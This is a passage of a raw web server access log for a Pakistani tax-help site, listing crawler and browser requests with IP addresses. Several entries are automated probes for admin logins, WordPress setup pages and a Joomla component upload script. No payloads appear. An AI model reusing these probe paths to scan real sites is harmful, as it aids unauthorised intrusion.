Safari/537.36" 43.173.179.149 - - [20/Dec/2025:23:19:55 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.114 Safari/537.36" 43.173.181.189 - - [20/Dec/2025:23:19:57 -0500] "GET /css/style.css HTTP/1.1" 301 795 "http://www.taxhelplines.com.pk/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.114 Safari/537.36" 43.163.22.90 - - [20/Dec/2025:23:20:09 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" 216.244.66.203 - - [20/Dec/2025:23:38:34 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 216.244.66.236 - - [20/Dec/2025:23:40:39 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 216.244.66.236 - - [20/Dec/2025:23:40:39 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 216.244.66.236 - - [20/Dec/2025:23:40:39 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 112.86.225.45 - - [20/Dec/2025:23:43:54 -0500] "GET / HTTP/1.1" 301 795 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" 216.244.66.236 - - [21/Dec/2025:00:25:50 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 216.244.66.236 - - [21/Dec/2025:00:25:50 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 150.109.12.53 - - [21/Dec/2025:00:52:42 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 36.111.67.189 - - [21/Dec/2025:01:09:45 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" 36.111.67.189 - - [21/Dec/2025:01:09:46 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" 216.244.66.236 - - [21/Dec/2025:01:10:51 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 161.35.101.142 - - [21/Dec/2025:01:28:45 -0500] "GET /admin/imger/gdp-increase-636251500-c69345ee97ba4db99375723519a2c1bd-696x522.jpg HTTP/1.1" 301 795 "http://taxhelplines.com.pk/admin/imger/gdp-increase-636251500-c69345ee97ba4db99375723519a2c1bd-696x522.jpg" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 66.249.75.234 - - [21/Dec/2025:01:34:35 -0500] "GET /ads.txt HTTP/1.1" 301 795 "-" "Google-adstxt" 216.244.66.236 - - [21/Dec/2025:01:56:43 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 216.244.66.236 - - [21/Dec/2025:01:56:43 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 216.244.66.244 - - [21/Dec/2025:02:03:52 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 104.28.246.115 - - [21/Dec/2025:02:25:50 -0500] "GET /style.php HTTP/1.1" 301 795 "-" "Go-http-client/1.1" 216.244.66.236 - - [21/Dec/2025:02:42:22 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 125.94.144.102 - - [21/Dec/2025:02:35:29 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" 104.28.246.115 - - [21/Dec/2025:02:43:04 -0500] "GET /style.php HTTP/1.1" 301 795 "-" "Go-http-client/1.1" 40.77.167.16 - - [21/Dec/2025:03:03:01 -0500] "GET /public_html/book/valuation_pdf/valuation-1305.pdf HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 199.244.88.222 - - [21/Dec/2025:03:06:46 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36" 34.7.163.81 - - [21/Dec/2025:03:13:46 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; x86_64 GNU/Linux) AppleWebKit/601.1 (KHTML, like Gecko) Version/8.0 Safari/601.1 WPE ComcastAppPlatform 43A6GX Firebolt/0.8.1" 194.38.22.4 - - [21/Dec/2025:03:19:27 -0500] "GET /components/com_jbusinessdirectory/assets/upload.php HTTP/1.1" 301 795 "-" "ALittle Client" 43.135.140.225 - - [21/Dec/2025:03:51:20 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" 93.158.90.73 - - [21/Dec/2025:03:56:00 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.3" 176.241.48.24 - - [21/Dec/2025:04:02:27 -0500] "GET /admin.php HTTP/1.1" 301 795 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 176.241.48.24 - - [21/Dec/2025:04:01:45 -0500] "GET /admin/login HTTP/1.1" 301 795 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 176.241.48.24 - - [21/Dec/2025:04:01:50 -0500] "GET /admin HTTP/1.1" 301 795 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 176.241.48.24 - - [21/Dec/2025:04:02:03 -0500] "GET /admin/login HTTP/1.1" 301 795 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 176.241.48.24 - - [21/Dec/2025:04:02:08 -0500] "GET /admin/login HTTP/1.1" 301 795 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 176.241.48.24 - - [21/Dec/2025:04:02:22 -0500] "GET /admin/login HTTP/1.1" 301 795 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 176.241.48.24 - - [21/Dec/2025:04:02:41 -0500] "GET /admin/login HTTP/1.1" 301 795 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 176.241.48.24 - - [21/Dec/2025:04:02:47 -0500] "GET /admin.php HTTP/1.1" 301 795 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 192.36.53.165 - - [21/Dec/2025:04:11:26 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_1_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Mobile/15E148 Safari/604" 216.244.66.236 - - [21/Dec/2025:04:11:52 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 216.244.66.236 - - [21/Dec/2025:04:11:52 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 216.244.66.236 - - [21/Dec/2025:04:11:52 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 40.77.167.17 - - [21/Dec/2025:04:29:13 -0500] "GET /public_html/images/import_exam_manual.png HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 43.135.186.135 - - [21/Dec/2025:04:30:58 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" 2a06:98c0:3600::103 - - [21/Dec/2025:04:31:06 -0500] "GET /wp-admin/setup-config.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" 167.99.153.167 - - [21/Dec/2025:04:39:56 -0500] "GET /admin/imger/car-loan-auto-financing-696x379.png HTTP/1.1" 301 795 "http://www.taxhelplines.com.pk/admin/imger/car-loan-auto-financing-696x379.png" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.119 Safari/537.36" 2a06:98c0:3600::103 - - [21/Dec/2025:04:30:13 -0500] "GET /wp-admin/setup-config.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" 2a06:98c0:3600::103 - - [21/Dec/2025:04:32:55 -0500] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 301 795 "-" "http://customhelpline.com.pk/wordpress/wp-admin/setup-config.php" 2a06:98c0:3600::103 - - [21/Dec/2025:04:33:27 -0500] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" 157.55.39.58 - - [21/Dec/2025:04:48:37 -0500] "GET /viewreport?id=708 HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 216.244.66.236 - - [21/Dec/2025:04:55:50 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 216.244.66.236 - - [21/Dec/2025:04:55:50 -0500] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 112.86.225.61 - - [21/Dec/2025:05:05:53 -0500] "GET / HTTP/1.1" 301 795 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" 43.173.180.147 - - [21/Dec/2025:05:15:53 -0500] "GET /css/style.css HTTP/1.1" 301 795 "http://www.taxhelplines.com.pk/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.114 Safari/537.36" 43.173.179.183 - - [21/Dec/2025:05:16:13 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.114 Safari/537.36" 43.173.173.125 - - [21/Dec/2025:05:15:51 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.114 Safari/537.36" 43.173.179.98 - - [21/Dec/2025:05:16:05 -0500] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"